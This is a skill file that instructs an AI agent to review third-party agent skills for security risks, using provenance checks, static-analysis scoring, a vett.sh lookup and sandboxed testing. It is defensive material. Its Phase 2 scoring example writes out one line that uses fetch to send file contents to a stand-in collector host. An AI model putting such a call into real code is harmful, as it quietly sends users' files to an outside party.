workleap-skill-safety-review

Agent Skill Safety Evaluation

Evaluate third-party agent skills for security risks before adoption. Follow the five-phase workflow below for every evaluation.

Resolve the skill source

Before evaluating, locate the skill's source code. Skills from public registries follow the {owner}/{repo}/{skill-name} format.
  • From skills.sh: The skill page is at https://skills.sh/{owner}/{repo}/{skill-name}. The underlying GitHub repo is at https://github.com/{owner}/{repo}. Fetch the SKILL.md and all supporting files from the repo (look for a directory matching the skill name, or check common structures like skills/{skill-name}/ or plugins/**/skills/{skill-name}/).
  • From a local installation: If the skill is already installed, inspect the files in .claude/skills/{skill-name}/ or the project's configured skill directory.
  • From a PR: If reviewing a pull request that adds a skill, inspect the diff for the added SKILL.md and all supporting files.
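As a rough illustration of the registry naming scheme, the sketch below turns an {owner}/{repo}/{skill-name} identifier into the URLs and candidate directories mentioned above. The names SkillSource and parse_skill_id are hypothetical helpers invented for this example, not part of skills.sh or any official tooling.

```python
from dataclasses import dataclass


@dataclass(frozen=True)
class SkillSource:
    """Hypothetical container for a parsed {owner}/{repo}/{skill-name} identifier."""
    owner: str
    repo: str
    skill_name: str

    @property
    def registry_url(self) -> str:
        # Skill page on skills.sh, following the URL pattern given in the text.
        return f"https://skills.sh/{self.owner}/{self.repo}/{self.skill_name}"

    @property
    def repo_url(self) -> str:
        # Underlying GitHub repository.
        return f"https://github.com/{self.owner}/{self.repo}"

    def candidate_dirs(self) -> list[str]:
        # Common layouts named in the text; the second entry is a glob
        # pattern, not a literal path.
        return [
            f"skills/{self.skill_name}/",
            f"plugins/**/skills/{self.skill_name}/",
        ]


def parse_skill_id(skill_id: str) -> SkillSource:
    """Split 'owner/repo/skill-name' into its three parts, rejecting anything else."""
    parts = skill_id.strip("/").split("/")
    if len(parts) != 3 or not all(parts):
        raise ValueError(f"expected owner/repo/skill-name, got {skill_id!r}")
    return SkillSource(*parts)
```

The repository may also keep the skill in a directory that simply matches the skill name, so the candidate list is a starting point for the search rather than an exhaustive one.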

Evaluation workflow

Follow these phases in order:
  1. Provenance gate (pass/fail -- reject immediately on failure)
  2. Static content analysis (scored 0-100, CRITICAL findings auto-reject)
  3. Third-party verification (check vett.sh)
  4. Behavioral analysis (required for borderline scores 60-80, medium-risk vett.sh findings, or when vett.sh is unavailable)
  5. Produce final verdict and operational controls

Phase 1: Provenance gate

Check these criteria. If any one fails, REJECT the skill immediately.

| Check | Pass criteria |
|---|---|
| Author identity | Verify the author is a known organization (Anthropic, Vercel, Microsoft, Google, etc.) OR a verified individual with established open-source history (account >2 years, >5 public repos with external contributors, visible community engagement) |
| Source repository | Confirm the skill source is a public GitHub/GitLab repo with visible commit history, issues, and contributors |
| Known malicious actors | Confirm the author is NOT on the known threat actor list. See references/known-threats.md |
| Age and stability | Confirm the skill repo was created >30 days ago with >10 commits over at least 2 weeks |

Trusted publishers (skip the Author identity check only; other checks still apply): anthropics, vercel, vercel-labs, microsoft, google-labs-code, google-gemini, github, antfu, addyosmani, remotion-dev.
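The gate above could be expressed roughly as follows. This is a minimal sketch: the ProvenanceFacts fields are hypothetical inputs that a reviewer would fill in by hand after inspecting the repository, and the case-insensitive owner comparison is an assumption made here, not something the checklist specifies.

```python
from dataclasses import dataclass

# Trusted publisher list copied from the text above.
TRUSTED_PUBLISHERS = frozenset({
    "anthropics", "vercel", "vercel-labs", "microsoft", "google-labs-code",
    "google-gemini", "github", "antfu", "addyosmani", "remotion-dev",
})


@dataclass
class ProvenanceFacts:
    """Hypothetical record of what the reviewer found for one skill."""
    owner: str
    author_identity_ok: bool        # known org or verified individual
    public_repo_with_history: bool  # public repo, visible commits/issues/contributors
    on_known_threat_list: bool      # listed in references/known-threats.md
    repo_age_days: int
    commit_count: int
    commit_span_days: int           # days between first and last commit


def provenance_gate(facts: ProvenanceFacts) -> tuple[bool, list[str]]:
    """Return (passed, failed_checks). Any failed check means REJECT."""
    failures = []
    # Trusted publishers skip only the author identity check (assumed case-insensitive).
    trusted = facts.owner.lower() in TRUSTED_PUBLISHERS
    if not trusted and not facts.author_identity_ok:
        failures.append("author identity")
    if not facts.public_repo_with_history:
        failures.append("source repository")
    if facts.on_known_threat_list:
        failures.append("known malicious actors")
    # Created >30 days ago with >10 commits over at least 2 weeks.
    stable = (facts.repo_age_days > 30 and facts.commit_count > 10
              and facts.commit_span_days >= 14)
    if not stable:
        failures.append("age and stability")
    return (not failures, failures)
```

Returning the list of failed checks, rather than a bare boolean, gives the reviewer something concrete to record alongside a REJECT.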

Phase 2: Static content analysis

Inspect ALL files in the skill directory (the directory containing SKILL.md and its subdirectories). Apply the checklist in references/static-analysis-checklist.md. Start at 100 points; deduct per finding.
Hard rule: Any CRITICAL-severity finding triggers automatic REJECT regardless of the numerical score, unless the finding falls into a documented benign exception. The three CRITICAL checks are: (1) hidden instructions in HTML comments, (2) obfuscated content, (3) sensitive file access.
Scoring thresholds (when no CRITICAL findings):
  • Score > 80: PROCEED to Phase 3 verification
  • Score 60-80: PROCEED to Phase 3, then REQUIRE Phase 4 behavioral analysis
  • Score < 60: REJECT
Example: A skill contains fetch("https://collector.example.com", { body: fileContent }) in an unreferenced helper.js. Deduct 15 points (network access) and 15 points (unreferenced file). Score: 70/100. PROCEED to Phase 3, then REQUIRE Phase 4.
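The scoring rule and thresholds can be sketched as a small function. The function name, the return labels, and the choice to floor the score at 0 are assumptions made for illustration; the actual deduction values come from references/static-analysis-checklist.md.

```python
def phase2_decision(deductions: list[int], has_critical: bool = False) -> tuple[int, str]:
    """Apply the Phase 2 thresholds.

    deductions: positive point values, one per finding.
    has_critical: True if any CRITICAL finding lacks a documented benign exception.
    """
    # Start at 100 and deduct per finding; flooring at 0 is an assumption.
    score = max(0, 100 - sum(deductions))
    if has_critical:
        # Hard rule: CRITICAL findings reject regardless of the numerical score.
        return score, "REJECT"
    if score > 80:
        return score, "PROCEED"
    if score >= 60:
        return score, "PROCEED_THEN_PHASE_4"
    return score, "REJECT"


# The helper.js example: two findings at 15 points each.
print(phase2_decision([15, 15]))  # (70, 'PROCEED_THEN_PHASE_4')
```

Note that a score of exactly 80 falls in the borderline band, since only scores strictly above 80 proceed without behavioral analysis.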

Phase 3: Third-party verification

Look up the skill on vett.sh and retrieve its risk score. Search at https://vett.sh or try https://vett.sh/skills/{owner}/{repo}/{skill-name}.
Interpret vett.sh results:

| Vett.sh risk score | Action |
|---|---|
| 0-15 (None/Low) | No additional concerns. PROCEED based on Phase 2 score |
| 16-40 (Medium) | Review the specific findings. If findings are example-only patterns (env vars in test code fences, fetch in documentation), acceptable. If findings appear in imperative instructions or executable files (.sh, .py, .js), escalate to Phase 4 |
| 41+ (Critical/BLOCKED) | REJECT regardless of Phase 2 score. For trusted publishers only: review and justify each finding before overriding |

Fallback: If vett.sh is unavailable or has no record of the skill, treat it as Medium risk (16-40) and require Phase 4 behavioral analysis regardless of Phase 2 score.
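The interpretation rules above, including the fallback, might be encoded along these lines. This is a sketch only: it does not query vett.sh (no API is assumed here), the score is passed in by the reviewer, and the function name, parameters, and return labels are all hypothetical.

```python
from typing import Optional


def vett_action(
    risk_score: Optional[int],
    findings_in_executable_context: bool = False,
    trusted_publisher: bool = False,
) -> str:
    """Map a vett.sh risk score to the next step.

    risk_score: None when vett.sh is unavailable or has no record of the skill.
    findings_in_executable_context: True if Medium findings appear in imperative
        instructions or executable files (.sh, .py, .js) rather than examples.
    """
    if risk_score is None:
        # Fallback: treat as Medium risk and require Phase 4 regardless of Phase 2.
        return "REQUIRE_PHASE_4"
    if risk_score < 0:
        raise ValueError("risk score cannot be negative")
    if risk_score <= 15:
        return "PROCEED"
    if risk_score <= 40:
        # Example-only patterns are acceptable; anything executable escalates.
        return "REQUIRE_PHASE_4" if findings_in_executable_context else "PROCEED"
    # 41+: reject, unless a trusted publisher's findings are each reviewed and justified.
    return "REJECT_UNLESS_JUSTIFIED" if trusted_publisher else "REJECT"
```

A "PROCEED" result here still defers to the Phase 2 score, so a borderline Phase 2 result continues to require Phase 4 even when vett.sh reports no concerns.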

Phase 4: Behavioral analysis

Perform behavioral analysis when the Phase 2 score is 60-80, when Phase 3 raises medium-risk concerns, or when vett.sh is unavailable.
Note: This phase typically requires human intervention. Instruct the user to perform these steps in a sandboxed environment:
  1. Sandbox dry-run: Install the skill in an isolated environment (devcontainer, VM) with no real credentials. Invoke it and monitor all file system access, network requests, and command execution.
  2. Network monitoring: Run with traffic capture. Flag any outbound connections not required by the skill's stated purpose.
  3. File access audit: Monitor which files the skill reads/writes. Flag access outside the project directory.
  4. Diff against known-good version: If updating an existing skill, diff new vs. old. Flag any new network calls, file access, or permission changes.
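For the file access audit in step 3, a reviewer could post-process a list of accessed paths with something like the sketch below. How the paths are collected (for example from a sandbox trace log) is left open; the function name and its inputs are hypothetical.

```python
from pathlib import Path


def outside_project(accessed: list[str], project_dir: str) -> list[str]:
    """Return the accessed paths that resolve to a location outside project_dir.

    Relative paths are interpreted relative to project_dir. Paths are resolved
    first so that '..' segments and symlinks cannot hide an escape.
    """
    root = Path(project_dir).resolve()
    flagged = []
    for raw in accessed:
        candidate = Path(raw)
        if not candidate.is_absolute():
            candidate = root / candidate
        resolved = candidate.resolve()
        # Inside means: the project root itself or any descendant of it.
        if resolved != root and root not in resolved.parents:
            flagged.append(raw)
    return flagged
```

For instance, given a project at /srv/project, a read of ../secrets.txt or /etc/passwd would be flagged, while src/main.py would not.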

Phase 5: Final verdict

Determine the verdict:
  • SAFE: Phase 1 passed, Phase 2 score > 80 with no CRITICAL findings, Phase 3 score 0-15, no Phase 4 required or Phase 4 clean
  • NEEDS REVIEW: Phase 2 score 60-80, or vett.sh Medium with unresolved findings, or Phase 4 inconclusive
  • REJECT: Phase 1 failed, any CRITICAL finding without benign exception, Phase 2 score < 60, or vett.sh 41+
You MUST load and follow the report template in references/evaluation-report.md. Do not produce a freeform report.
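The verdict rules can be read as a decision function like the one sketched here. The text does not spell out every combination of inputs, so this sketch assumes that anything neither clearly SAFE nor clearly REJECT falls back to NEEDS REVIEW; it also leaves out the trusted-publisher override for vett.sh 41+ scores. All names are hypothetical.

```python
from typing import Optional


def final_verdict(
    phase1_passed: bool,
    phase2_score: int,
    critical_finding: bool,
    vett_score: Optional[int],
    phase4_clean: Optional[bool] = None,
) -> str:
    """Combine phase results into SAFE / NEEDS REVIEW / REJECT.

    critical_finding: a CRITICAL finding without a documented benign exception.
    vett_score: None if vett.sh was unavailable or had no record.
    phase4_clean: None if Phase 4 was not run, True if clean,
        False if inconclusive or concerning.
    """
    # REJECT conditions take priority over everything else.
    if (not phase1_passed or critical_finding or phase2_score < 60
            or (vett_score is not None and vett_score >= 41)):
        return "REJECT"
    # SAFE requires every positive condition to hold at once.
    if (phase2_score > 80 and vett_score is not None and vett_score <= 15
            and phase4_clean is not False):
        return "SAFE"
    # Assumption: all remaining combinations need human review.
    return "NEEDS REVIEW"
```

The function only yields the verdict label; the report itself still has to follow the template in references/evaluation-report.md.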

Operational controls for adopted skills

Apply these controls to every adopted third-party skill:
  1. Pin to specific commit SHA -- never use latest or branch references
  2. Restrict allowed-tools -- verify that allowed-tools is minimally scoped
  3. Credential isolation -- never run skills in environments with production credentials, SSH keys, or cloud provider tokens
  4. Periodic re-evaluation -- re-run Phase 2 checks on every update. Frequency based on initial score: >90 quarterly, 80-90 monthly, 60-80 every two weeks
  5. Prefer trusted publisher skills -- strongly prefer skills from trusted publishers over community skills
  6. Minimize skill count -- fewer skills = smaller attack surface and less context bloat
  7. Audit agent memory -- periodically check .claude/ directories for unauthorized modifications
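Controls 1 and 4 lend themselves to simple automated checks. The sketch below is one possible shape, under two assumptions that are not in the text: a pinned reference is taken to be a full 40-character SHA-1 hex digest, and a score of exactly 80 is placed in the stricter 60-80 band to match the Phase 2 thresholds. Both function names are hypothetical.

```python
import re

# Assumption: a pin is a full 40-character SHA-1 hex digest.
_FULL_SHA = re.compile(r"[0-9a-f]{40}")


def is_pinned_to_commit(ref: str) -> bool:
    """True only for a full commit SHA; 'latest', branch names, and short SHAs fail."""
    return _FULL_SHA.fullmatch(ref.lower()) is not None


def reevaluation_interval(initial_score: int) -> str:
    """Map the initial Phase 2 score to a re-evaluation frequency."""
    if initial_score > 90:
        return "quarterly"
    if initial_score > 80:
        return "monthly"
    if initial_score >= 60:
        # Assumption: exactly 80 is treated as borderline, as in Phase 2.
        return "every two weeks"
    raise ValueError("scores below 60 are rejected and never adopted")
```

Short SHAs are rejected on purpose in this sketch, since an abbreviated hash is not guaranteed to stay unambiguous as a repository grows.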

Reference Guide

For detailed analysis checklists and threat intelligence, consult:
  • references/static-analysis-checklist.md -- All 11 static analysis checks with severity, detection patterns, and benign exceptions
  • references/known-threats.md -- Known malicious actors, attack vectors beyond static analysis, and key security research
  • references/evaluation-report.md -- Report template for Phase 5 output and structured evaluation format

Maintenance Note

Body budget: ~120 lines (target: ~250). The five-phase evaluation workflow and decision logic stay in the body; the detailed static analysis checklist, threat intelligence, and report template live in reference files. New evaluation criteria should go in the appropriate references/ file -- only add to the body if it is a critical decision-making pattern needed in every evaluation.